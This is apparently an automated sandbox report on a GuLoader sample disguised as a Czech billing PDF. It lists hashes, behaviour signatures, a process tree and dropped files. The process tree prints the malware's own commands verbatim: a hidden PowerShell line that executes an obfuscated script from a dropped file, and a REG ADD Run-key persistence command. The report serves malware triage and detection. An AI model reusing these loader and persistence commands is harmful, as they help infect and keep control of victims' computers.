Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 05:38
Static task
static1
Behavioral task
behavioral1
Sample
Vyuctovani_2024_07-1206812497·pdf.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
Vyuctovani_2024_07-1206812497·pdf.exe
Resource
win10v2004-20240611-en
General
-
Target
Vyuctovani_2024_07-1206812497·pdf.exe
-
Size
892KB
-
MD5
3fb7cb8d7fd9efd2bc0cae35eb42c4fe
-
SHA1
ce06ab538757edb9b1d4cce656006da0d3795bb1
-
SHA256
705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
-
SHA512
97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
-
SSDEEP
24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 2 IoCs
Processes:
powershell.exeNubilum.exepid process 660 powershell.exe 844 Nubilum.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\husmndenes = "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\\Bukkespringenes\\').Hovedstads;%tomboyism% ($Eftertaklede)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
Nubilum.exepid process 844 Nubilum.exe 844 Nubilum.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeNubilum.exepid process 660 powershell.exe 844 Nubilum.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 660 set thread context of 844 660 powershell.exe Nubilum.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 660 powershell.exe 660 powershell.exe 660 powershell.exe 660 powershell.exe 660 powershell.exe 660 powershell.exe 660 powershell.exe 660 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 660 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
Vyuctovani_2024_07-1206812497·pdf.exepowershell.exeNubilum.execmd.exedescription pid process target process PID 1200 wrote to memory of 660 1200 Vyuctovani_2024_07-1206812497·pdf.exe powershell.exe PID 1200 wrote to memory of 660 1200 Vyuctovani_2024_07-1206812497·pdf.exe powershell.exe PID 1200 wrote to memory of 660 1200 Vyuctovani_2024_07-1206812497·pdf.exe powershell.exe PID 1200 wrote to memory of 660 1200 Vyuctovani_2024_07-1206812497·pdf.exe powershell.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 660 wrote to memory of 844 660 powershell.exe Nubilum.exe PID 844 wrote to memory of 1196 844 Nubilum.exe cmd.exe PID 844 wrote to memory of 1196 844 Nubilum.exe cmd.exe PID 844 wrote to memory of 1196 844 Nubilum.exe cmd.exe PID 844 wrote to memory of 1196 844 Nubilum.exe cmd.exe PID 1196 wrote to memory of 2468 1196 cmd.exe reg.exe PID 1196 wrote to memory of 2468 1196 cmd.exe reg.exe PID 1196 wrote to memory of 2468 1196 cmd.exe reg.exe PID 1196 wrote to memory of 2468 1196 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe"C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Nubilum.exe"C:\Users\Admin\AppData\Local\Temp\Nubilum.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"5⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\twinsomeness\Nyde.HalFilesize
314KB
MD57ff3d5bfd31d06f172660bc9457c8bdf
SHA19d84f647eab98d98e4c9f77e3bc29ca213063ac7
SHA256a44b7bed6111afa49d3955e6a7e267f090fbfc78fdb766cb882c41af59af8e99
SHA5122b9b4c5abf7f6270903a0456dd596a7051be854886951719de7b625aae0f30651685d2cb8e0fa78c8977bae181e642fbf7381673f7701424ff7a19170ed806a2
-
C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28Filesize
71KB
MD5a722a8ee65ce2bf5d2fbd7450d8fe960
SHA12992f4b10c0e3d771862c5204b9b304ec2e50634
SHA256feb62e067d0cd459bc5c93ac7dcb76062257d26d8fb47e9b9e9f9d94c6706ae3
SHA5120052efd489bba988c6147bfcc5acb6fccd81ff5a54f9b75c98dd69426c5d1a99513d89f17942d6606cb8786515ff3a35c7c862b7db8f3a12b1ecba63a9df8db9
-
\Users\Admin\AppData\Local\Temp\Nubilum.exeFilesize
892KB
MD53fb7cb8d7fd9efd2bc0cae35eb42c4fe
SHA1ce06ab538757edb9b1d4cce656006da0d3795bb1
SHA256705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
SHA51297bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
-
memory/660-18-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-15-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-13-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-11-0x0000000073A91000-0x0000000073A92000-memory.dmpFilesize
4KB
-
memory/660-14-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-20-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-21-0x0000000006740000-0x0000000007224000-memory.dmpFilesize
10.9MB
-
memory/660-12-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/660-26-0x0000000073A90000-0x000000007403B000-memory.dmpFilesize
5.7MB
-
memory/844-33-0x0000000000840000-0x00000000018A2000-memory.dmpFilesize
16.4MB
-
memory/844-49-0x00000000018B0000-0x0000000002394000-memory.dmpFilesize
10.9MB